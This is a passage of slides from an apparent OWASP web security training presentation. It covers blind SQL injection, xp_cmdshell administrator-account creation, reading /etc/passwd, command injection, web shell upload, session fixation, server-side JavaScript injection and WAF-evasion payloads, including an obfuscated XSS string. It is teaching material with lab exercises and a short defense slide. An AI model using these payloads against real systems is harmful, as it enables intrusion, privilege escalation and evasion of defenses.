http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <119 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <114 waitfor delay'0:0:20'--TRUE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) <112 waitfor delay'0:0:20'--FALSE
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) =111 waitfor delay'0:0:20'--TRUE111 (ASCII (DECIMAL))First char is o
Blind SQL Injection
![Page 87: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/87.jpg)
Logical AND (&) Technique (break out the ascii chart)
How logical AND operator works◦ 1 & 1 = 1◦ 1 & 0 = 0◦ 0 & 1 = 0 ◦ 0 & 0 = 0◦ 1100 & 0110 = 0100
This technique will extract one bit at a time (8 requests per byte)
Blind SQL Injection
![Page 88: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/88.jpg)
Ascii Character 'o' is HEX 6F and binary 0110 1111
Since ascii characters are 128 bits long we will AND each character with 128 (1000 0000), 64 (0100 0000), 32 (0010 0000), 16 (0001 0000), 8 (0000 1000), 4 (0000 0100), 2 (0000 0010), 1 (0000 0001)
If we do a logical AND with each bit and delay a certain number of seconds if the result of the logical AND equals 1 then we should get
NO-DELAY, DELAY, DELAY, NO-DELAYDELAY, DELAY, DELAY, DELAY
Blind SQL Injection
![Page 89: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/89.jpg)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 128=128 waitfor delay'0:0:20'--FALSE (NO-Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 64=64 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 32=32 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 16=16 waitfor delay'0:0:20'--FALSE (NO-Delay)
Blind SQL Injection
![Page 90: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/90.jpg)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 8=8 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 4=4 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 2=2 waitfor delay'0:0:20'--TRUE (Delay)
http://victim.com/search.aspx?id=1';if ASCII(SUBSTRING(SYSTEM_USER,1,1)) & 1=1 waitfor delay'0:0:20'--TRUE (Delay)
Blind SQL Injection
![Page 91: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/91.jpg)
The Logic AND technique will take roughly the same amount of requests on average as the binary search technique. However, the Logical AND technique does not depend on the previous request (ie. The requests are idempotent). This means when using the logical AND technique multiple requests can be made at the same time.
Blind SQL Injection
![Page 92: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/92.jpg)
Inference response based blind SQL Injection
True or False based on the sites response or response data
http://victim.com/search.aspx?id=1' and 1=1 --(no 500)http://victim.com/search.aspx?id=1' and 1=1/0 --(500)
Blind SQL Injection
![Page 93: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/93.jpg)
Oracle timing based SQL Injection (select
'a'||Utl_Http.request('http://madeupserver.com') from dual WHERE (SELECT username FROM all_users WHERE username='DBSNMP') = 'DBSNMP') --
Blind SQL Injection
![Page 94: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/94.jpg)
Heavy Queries
http://victim.com/search.aspx?id=1' and (light query) and (heavy query)
Blind SQL Injection
![Page 95: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/95.jpg)
Demo
![Page 96: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/96.jpg)
Execute commands in MSSQL by using xp_cmdshell
' exec sp_configure 'show advanced options,1 –-' ; RECONFIGURE –- ' exec sp_configure 'xp_cmdshell',1 – ' ; RECONFIGURE -- ' exec master..xp_cmdshell 'net user pwny pwnsauce /ADD' --
' exec master..xp_cmdshell 'net localgroup Administrators pwny /ADD' –
Metasploit and Core Impact both have modules for this that could help speed up exploitation and pivoting on a system
SQL Injection Operating System
![Page 97: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/97.jpg)
MySQL read file from filesystem ◦ select LOAD_FILE('/etc/passwd')
MySQL write file to filesystem◦ select 'this is a test' into outfile '/var/www/test.txt'
SQL Injection Operating System
![Page 98: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/98.jpg)
Parameterized Queries or Prepared Statements
Don’t put user input into Order by clause. Order by clause is not usually supported with parameterized queries◦ ASC and DESC are only two options. You can use if
statement or sort output in javascript◦ Can grab valid table names or values using a
query then check to see if user input matches. Then concatenate with result from query
SQL Injection Defense
![Page 99: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/99.jpg)
https://victim.com/dnslookup.php?dnsentry=google.com
https://victim.com/dnslookup.php?dnsentry=google.com;cat%20%2fetc%2fpasswd
https://victim.com/dnslookup.php?dnsentry=google.com;cat /etc/passwd
https://victim.com/dnslookup.php?dnsentry=blah;&&ls -l
Command Injection
![Page 100: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/100.jpg)
Commands◦ google.com; ping -c 20 localhost◦ google.com & ping -c 20 localhost◦ google.com && ping -c 20 localhost◦ google.com && ping -n 20 localhost◦ google.com && ping -c 20 localhost #◦ google.com && echo ‘<php …system(…)..’ >
/var/www/site/cmd.php
Command Injection
![Page 101: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/101.jpg)
https://172.17.0.42/dvwa/ Command Execution
EXERCISE – Command Injection
![Page 102: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/102.jpg)
Upload a dynamic file (ie. php, asp, aspx, jsp, etc..)
Run the dynamic code by going to the file using a web browser◦ http://victim.com/uploads/shell.php
Arbitrary File Upload
![Page 103: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/103.jpg)
https://172.17.0.42/dvwa/ → Upload Use: https://172.17.0.144/downloads/
EXERCISE – Arbitrary File Upload
![Page 104: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/104.jpg)
Cookie: admin=false Cookie: 139434 Cookie: logged_in=false
Burp Sequencer can be used to identify non random cookie variables
Session Manipulation and Session Hijacking
![Page 105: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/105.jpg)
Padding Oracle Attack POET tool
Session Manipulation and Session Hijacking
![Page 106: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/106.jpg)
http://victim.com/login.php?SESSID=4v0rmq4gosaag63rla631gl5m2
http://victim.com/login.php?SESSID=aaaaaaaaaaaaaaaaaaaaaaaaaa
Send to someone else to automatically set there cookie. Let them login and take over there session
Session Fixation
![Page 107: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/107.jpg)
Node.js Mongodb (NoSQL with javascript engine) CouchDB (NoSQL with javascript engine)
Javascript Server Side Injection
![Page 108: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/108.jpg)
POST/test/ HTTP/1.1Host: 192.168.1.123User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
response.end(‘pwnd’);
Javascript Server Side Injection
![Page 109: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/109.jpg)
response.end(‘<script>alert(1)</script>’);
var fs = require(‘fs’); response.end(fs.readdrSync(‘c:\\’).toString());
var fs = require(‘fs’); response.end(fs.writeFileSync(‘c:\\secret.txt’,’littleSecret’));
require(‘child_process’).spawn(‘c:\\windows\\system32\\calc.exe’);
response.end(‘success’);
Javascript Server Side Injection
![Page 110: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/110.jpg)
NoSQL databases use a key value hashing technique to store data
NoSQL databases are not very strict on what data you can insert
NoSQL databse implementations may or may not implement standard SQL
NoSQL Injection
![Page 111: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/111.jpg)
Try characters one by one in the GET or POST to see if specific characters are blocked
WAFs very often drop your traffic (Burp will usually time out and your browser will show an error)
Instead of ◦ or '1'='1'--
Try◦ Or/**/'2'/**/LiKe/**/'2
Instead of◦ waitfor delay '0:0:20’--
Try ◦ Wait+for+dElay+'0:0:20’--
Defeating IDS/IPS/WAF
![Page 112: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/112.jpg)
Instead of◦ admin
Try◦ char(0x61)%2bchar(0x64)%2bchar(0x6D)
%2bchar(0x69)%2bchar(0x6E) Instead of
◦ ‘ union select password from users --%20 Try
◦ ‘(union(select(password)from(users))--((1))
Defeating IDS/IPS/WAF
![Page 113: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/113.jpg)
Change GET to POST or POST to GET or Use HEAD
Use IPv6 Change IPv4 version header to 5 (IPv5) HTTP Parameter Pollution
◦ http://victim.com/admin.php?userid=1&userid=2⚫ASP concatenates: 1,2⚫PHP takes last occurrence⚫ Java takes first occurrence
Change Content Type◦ Content-Type: multipart/; boundry=0000
⚫ (evasion of ModSecurity CRS)
Defeating IDS/IPS/WAF
![Page 114: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/114.jpg)
There are many ways in a database to do the same thing◦ @@version ◦ version()
◦ select banner from v$version where banner like ‘Oracle%’
◦ select version from v$instance
Defeating IDS/IPS/WAF
![Page 115: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/115.jpg)
Non alphanumeric xss◦ eval("aler"+(!![]+[])[+[]])("xss")◦ window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+
[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]
Defeating IDS/IPS/WAF
![Page 116: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/116.jpg)
[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])())[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])()(([]+{})[+[]])[+[]]+(!+[]+!![]+!![]+[])+([]+{})[!+[]+!![]]))()
Defeating IDS/IPS/WAF
![Page 117: OWASP San Diego Training Presentation](https://reader035.fdocuments.in/reader035/viewer/2022081504/5552b01db4c905d9508b4e09/html5/thumbnails/117.jpg)
Questions?